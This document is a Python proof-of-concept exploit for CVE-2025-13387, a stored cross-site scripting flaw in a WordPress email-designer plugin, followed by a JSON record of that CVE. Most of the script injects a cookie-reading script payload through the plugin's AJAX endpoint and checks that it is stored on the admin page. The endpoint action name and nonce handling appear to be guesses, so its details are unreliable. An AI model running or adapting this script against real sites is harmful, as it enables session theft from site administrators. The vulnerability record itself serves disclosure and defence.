CVE-2025-13387

import requests import re # CVE-2025-13387 PoC - Stored XSS in Kadence WooCommerce Email Designer # Target: WordPress site with Kadence WooCommerce Email Designer plugin <= 1.5.17 target_url = "http://target-wordpress-site.com" # XSS payload for customer name field xss_payload = '<script>alert(document.cookie)</script>' def exploit_stored_xss(): """ Exploit the stored XSS vulnerability via customer name input. The payload is stored in the database and executed when viewed. """ # Step 1: Identify the vulnerable input field in the plugin # The customer name field in email designer settings is vulnerable vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Step 2: Inject XSS payload through the customer name parameter # This is typically found in the email template customization headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } data = { 'action': 'kadence_woo_email_save_customer_name', 'customer_name': xss_payload, 'nonce': 'attacker_provided_or_broken_nonce' } try: response = requests.post(vulnerable_endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] XSS payload injected successfully") print(f"[+] Payload: {xss_payload}") print(f"[+] The script will execute when admin views the email template") # Step 3: Verify the injection by accessing the affected page verify_url = f"{target_url}/wp-admin/admin.php?page=kadence-woo-email-designer" verify_response = requests.get(verify_url) if xss_payload in verify_response.text: print(f"[+] XSS successfully stored and reflected in the page") return True else: print(f"[-] Injection failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-13387 - Kadence WooCommerce Email Designer XSS") print("=" * 60) exploit_stored_xss() print("\n[!] Note: This PoC demonstrates the vulnerability. Use responsibly.")

{"cve": {"id": "CVE-2025-13387", "sourceIdentifier": "[email protected]", "published": "2025-12-02T05:16:17.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kadence WooCommerce Email Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the customer name in all versions up to, and including, 1.5.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3399955/kadence-woocommerce-email-designer", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e0cf512-f676-4f47-abaa-5198998376b7?source=cve", "source": "[email protected]"}]}}